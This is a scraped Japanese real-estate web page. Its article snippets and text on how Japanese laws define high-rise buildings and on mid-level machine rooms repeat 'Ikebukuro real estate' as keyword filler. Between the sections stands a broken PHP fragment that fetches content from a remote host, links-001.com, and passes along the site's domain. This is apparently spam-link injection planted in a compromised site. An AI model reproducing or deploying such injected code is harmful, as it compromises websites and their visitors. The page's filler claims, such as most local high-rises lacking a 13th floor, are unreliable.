前へ
次へ

池袋の不動産の中層建築物

池袋の不動産の中層建築物は、建築物の階数や高さによって低層、中層、高層、超高層といった区切りがあり、

more

池袋の不動産のハイパービルディング

ハイパービルディングとは、1000メートル以上の高さを持つ建物のことで、池袋の不動産用語では別名超高

more

複合商業施設の池袋の不動産開発

池袋の不動産開発事業において、手っ取り早く収益をあげられる方法の一つに、複合商業施設があります。

more

池袋の不動産の高層建築物の定義

池袋の不動産の高層建築物の定義は、様々な法律の適用から考慮されると色々と解釈されるのが実態でもあります。
国土交通省の法令の運用からすると6階以上の建築物を言うと解釈されます。
その際たる例が都市計画法では6階以上と解釈されているからです。
そして、防災面を扱う法律である消防法によれば、高さ31m以上と言うように高さで判断します。
また建築基準法では、高層建築物の定義自体が見つからず、高さが60mを超える段階で構造耐力を異なるとする規定があるので、それを超えると超高層建築物の扱いになりそうです。
その他に地方公共団体の条例によって制定されるケースもあり、その場合、階数や高さのどちらかで池袋の不動産の高層建築物の定義をするかについては分かれるようです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

池袋の不動産の高層建築物の中間階機械室

池袋の不動産の高層建築物は、マンションや商業ビル等の10階以上の建物では中間機械室を設ける場合があります。
これは、高層建築物の空調設備やエレベーターを動かすため建築設備の要求から専用の機械室を設ける場合が多いのです。
特に13という数字が海外的にも厭われている事実があることから13階にこれらの中間機械室を設ける場合が多いです。
従って、ほとんどの池袋の不動産の高層建築物には13階がないというのが実態になっています。
実際には、通常時の使用の場合には、エレベーターは中間機械室を素通りします。
そして、エレベーターや空調設備等の定期点検やメンテナンスの時だけに、その部屋を業者の人が昇り降りすることができるようになっているのです。

Page Top